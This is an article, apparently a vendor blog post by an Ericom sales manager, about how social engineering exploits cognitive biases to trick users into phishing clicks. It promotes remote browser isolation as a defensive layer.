It’s no secret that system users within an organization pose a great threat to cybersecurity, even when an organization has invested in advanced technology to prevent security breaches. Whether they are naïve or merely distracted, these users can – and all too often do – compromise the security of the whole organization with a single click.
Of course, the users themselves don’t bear sole responsibility. Hackers use a plethora of sophisticated techniques, commonly referred to as “social engineering”, to trick or otherwise manipulate people into cooperating with their underhanded agenda, taking shrewd advantage of common human behaviors and cognitive biases. Cognitive biases refer to a deviation from rational behavior, such as the very human tendency to take mental “short-cuts” when making decisions under pressure, or to mindlessly carry out routine actions out of sheer habit. These social engineering tactics are used to trick people into infecting their own device with malware or giving up their private information – voluntarily.
For a hacker, social engineering may be the method of choice for getting access to privileged information. With traditional hacking methods, the hacker first has to gain access to a secure network, and then search for the information, which can take a long time and a lot of technology. By electing instead to manipulate users into giving up the information of their own accord, the hackers can just sit back and relax while responses come in, providing them with the right information to carry out a cyberattack. In fact, according to a recent Data Breach Investigations Report by Verizon, nearly half of all reported security breaches involved social engineering.
Scamming the savvy
You might still be thinking, “Sure, some people might fall for these tricks, but I know a scam when I see one.” Don’t be so sure. Hackers can use social engineering to successfully target even the most tech-savvy executives. In 2017, a British teenager, Kane Gamble, broke into the email accounts of DNI and CIA chiefs using social engineering. Through impersonation, he
managed to get enough personal information about these US officials to convince their email providers to reset passwords, giving Gamble full access to their email accounts.
Email scams these days are more sophisticated than ever. Hackers targeting particular organizations may gather a wide variety of details about their targeted users, to make the emails seem as convincing as possible. They may also create a sense of urgency, further clouding judgement. The email may spin a logical story, such as an organization prompting all users to download a phony “software update” to resolve a security problem or to urgently review an email attachment documenting some other (fake) company-wide concern.
Even users who are specifically trained to recognize phishing or spoofing attempts can make mistakes. While training is an essential and effective technique to reduce security breaches, it relies on one thing – the ability of the user to think slowly and rationally. Even the most careful user can make a careless click when they are distracted, under pressure, or even just plain tired. In these cases, the user might ignore the clear signs of phishing or a spoofed email address because they’re thinking quickly. As Daniel Kahneman writes in his book, “Thinking, Fast and Slow”, even those of us who are trained in advanced logic can fail to evaluate simple risks and make errors in judgement when thinking fast, leading to bad decisions – like clicking on a malicious link. No amount of training can prevent such a natural human behavior from happening – at least occasionally.
Smart solutions for smart scams
To mitigate the insider threat created by users who fall prey to social engineering, most organizations rely on traditional hardware and software solutions such as anti-virus software, firewalls, and email gateways to detect and block suspicious traffic or files from getting onto their network and endpoints. In fact, best practices dictate the use of multiple layers of security throughout the organization to ensure that there’s no single point of failure that exposes the network to a broad scale attack.
However, for advanced threats that can evade detection, organizations need to supplement these detect-and-block solutions with more proactive defenses, particularly when it comes to outward-facing applications such as email programs and web browsers. Advanced technology such as remote browser isolation, for example can proactively shield endpoints against even undetected browser-borne threats, preventing phishers and other cyber criminals from gaining entry through this popular threat vector.
Whe n using RBI, users can browse the web as normal through an interactive content stream. However, in the background, all active code for the browser session is executed in a virtual container in the DMZ or cloud. The container is destroyed when the session is over. Thus, if a user hastily clicks on something malicious, the code will never enter the organizational network. This keeps the organization protected from the potentially catastrophic result of a simple error in judgement.
Nothing will completely eliminate the threat of social engineering. Relying on training and education definitely isn’t enough. Attackers are always on the lookout for new ways to con and breach, both on the human and machine level. New, smart solutions, like RBI, should be used to provide a preventative layer of protection, allowing for human mistakes and cognitive biases without leaving an organization vulnerable to cyberattacks.
George has over twenty years of experience in delivering IT and cybersecurity solutions to organizations in the education, government, healthcare and finance sectors. He is currently the Regional Sales Manager for Northern Europe and the UK for Ericom Software, a global leader in securely connecting the digital workplace and protecting organizations from web-borne threats. Twitter: @GHannahEricomUK ; @Ericom_Software LinkedIn: https://www.linkedin.com/in/ghannah/; https://www.linkedin.com/company/ericom-software/